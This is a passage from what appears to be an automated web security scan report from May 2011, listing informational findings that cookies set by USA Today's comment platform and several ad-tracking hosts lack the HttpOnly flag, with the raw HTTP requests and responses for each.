Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 618
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "aaecb7f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:58 GMT
Connection: close

GIF89a................[..\..^.._..?..C..E..G..H..I..J..K..L..N..P..R..T..U..V..W..X..Y..~...........3..>..E..F..a..c..d..d..i...........................................................................
...[SNIP]...

11.92. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/checkplayer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/checkplayer.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/checkplayer.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072
If-None-Match: "0dca73e5f7fcb1:2af"
If-Modified-Since: Mon, 08 Nov 2010 16:08:56 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:10 GMT
Etag: "0dca73e5f7fcb1:2af"
Connection: close


11.93. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flXHR.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/flXHR.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/flXHR.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=
If-None-Match: "0dca73e5f7fcb1:2af"
If-Modified-Since: Mon, 08 Nov 2010 16:08:56 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:08 GMT
Etag: "0dca73e5f7fcb1:2af"
Connection: close


11.94. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/flensed.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/flensed.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/flensed.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072
If-None-Match: "8021d7f3917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:19 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:11 GMT
Etag: "8021d7f3917acb1:2af"
Connection: close


11.95. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/jquery.flXHRproxy.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072
If-None-Match: "0dca73e5f7fcb1:2af"
If-Modified-Since: Mon, 08 Nov 2010 16:08:56 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:10 GMT
Etag: "0dca73e5f7fcb1:2af"
Connection: close


11.96. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/jquery.xhr.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072
If-None-Match: "8021d7f3917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:19 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:10 GMT
Etag: "8021d7f3917acb1:2af"
Connection: close


11.97. http://sitelife.usatoday.com/ver1.0/Content/ua/scripts/flXHR/swfobject.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/scripts/flXHR/swfobject.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/scripts/flXHR/swfobject.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072
If-None-Match: "8021d7f3917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:19 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:11 GMT
Etag: "8021d7f3917acb1:2af"
Connection: close


11.98. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Stats/Tracker.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/Stats/Tracker.gif?plckUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckUserId=null&plckGcid=Pluck4&plckCurrentTime=1304955414035 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Content-Encoding: deflate
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:37:00 GMT
Connection: close


11.99. http://sitelife.usatoday.com/ver1.0/content/ua/css/pluckAll.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/content/ua/css/pluckAll.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/content/ua/css/pluckAll.css HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom; s_ppv=24
If-None-Match: "dfe75b1623ecc1:2af"
If-Modified-Since: Mon, 09 May 2011 08:28:34 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:01 GMT
Etag: "dfe75b1623ecc1:2af"
Connection: close


11.100. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=46732364.story&plckarticleurl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckarticletitle=Levee%2520blasted%2520along%2520Mississippi%2520River%2520to%2520spare%2520Cairo%252C%2520Ill.&clientUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:38:33 GMT
Connection: close
Content-Length: 94369

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...

11.101. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/usat/pluck/comments/comments.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/usat/pluck/comments/comments.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072
If-Modified-Since: Mon, 09 May 2011 08:27:57 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Connection: close
Date: Mon, 09 May 2011 15:38:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Content-Encoding: deflate
Content-Length: 0
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Cache-Control: public
Last-Modified: Mon, 09 May 2011 08:27:57 GMT
ETag: "4889D0CFAF8896B1003B735074638083"
Content-Type: text/html


11.102. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/usat/pluck/pluck.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/usat/pluck/pluck.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-Modified-Since: Mon, 09 May 2011 08:27:57 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Connection: close
Date: Mon, 09 May 2011 15:38:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Content-Encoding: deflate
Content-Length: 0
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Cache-Control: public
Last-Modified: Mon, 09 May 2011 08:27:57 GMT
ETag: "3CCDE5EE851A7D416FF8A4E14DAD9DB7"
Content-Type: text/html


11.103. http://syndication.mmismm.com/tntwo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /tntwo.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tntwo.php?mm_pub=7333&u=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&r=&t=300 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=csmonitor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:00 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--; expires=Sun, 08-May-2016 21:35:00 GMT; path=/; domain=.mmismm.com
Content-Length: 62
Content-Type: text/javascript

var msegs='AG=1;AK=1;AM=1;AQ=1';Mindset.handleResponse(msegs);

11.104. http://tacoda.at.atwola.com/rtx/r.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=AAU&si=18181&pi=L&xs=3&pu=http%253A//www.fox8live.com/business/default.aspx%253Fifu%253D&df=1&v=5.5&cb=58882 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1305554387|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; TData=99999|^|51134|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|57094|50961|52841|51182|56419|54032|51186|56988|56673|56148|57362|56969|60203|56835|56987|56780|50220|56768|56299|56761|54057|56681; N=2:d324038c0b1792515a8a9f1affa44cde,d324038c0b1792515a8a9f1affa44cde; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=; eadx=x

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:06 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 15:52:06 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 15:37:06 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305560226|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; path=/; expires=Mon, 16-May-11 15:37:06 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955426^1304957226|18181^1304955426^1304957226; path=/; expires=Mon, 09-May-11 16:07:06 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|56987|56835|56681|56761|56988|50213|56780|56232|50220; expires=Thu, 03-May-12 15:37:06 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:d324038c0b1792515a8a9f1affa44cde,cce56ea51bb938bc8d726cc79d6aee7f; expires=Thu, 03-May-12 15:37:06 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NTY5ODc6NTY4MzU6NTY2ODE6NTY3NjE=; expires=Thu, 03-May-12 15:37:06 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|
...[SNIP]...

11.105. http://tags.bluekai.com/site/3775  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3775

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3775 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
